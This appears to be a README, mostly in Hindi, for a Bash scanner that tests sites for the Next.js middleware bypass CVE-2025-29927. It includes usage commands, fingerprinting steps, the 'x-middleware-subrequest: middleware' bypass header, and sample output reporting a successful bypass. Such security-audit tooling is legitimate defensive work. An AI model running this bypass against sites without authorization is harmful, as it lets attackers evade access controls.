
CVE-2025-29927 एक्सप्लॉइट जाँचकर्ता
CVE-2025-29927 मिडलवेयर बायपास का पता लगाने के लिए Bash में स्वचालित उपकरण, Zhero Web Security के शोध पर आधारित।
bashwhatwebcurlDebian/Ubuntu पर इन्हें स्थापित करें:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
urls.txt फ़ाइल बनाएँ जिसमें प्रति पंक्ति एक URL हो:
https://target1.com
https://target2.com
फिर चलाएँ:
./nextjs_bypass_checker_v2.sh -l urls.txt
Next.js पहचान
whatweb का उपयोग करके तकनीक का पता लगाती है।/_next/static/BUILD_ID और _buildManifest.js को पढ़ने का प्रयास करती है।मिडलवेयर का पता लगाना
X-Middleware-RewriteX-Middleware-Set-Cookieबायपास परीक्षण
x-middleware-subrequest के बिना एक अनुरोध किया जाता है और हेडर का पता लगाया जाता है।[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत ऑडिटिंग उद्देश्यों के लिए है। इसका उपयोग बिना अनुमति के लक्ष्यों के विरुद्ध न करें। दुरुपयोग अवैध गतिविधि माना जा सकता है।
निम्नलिखित शोध पर आधारित: Zhero Web Security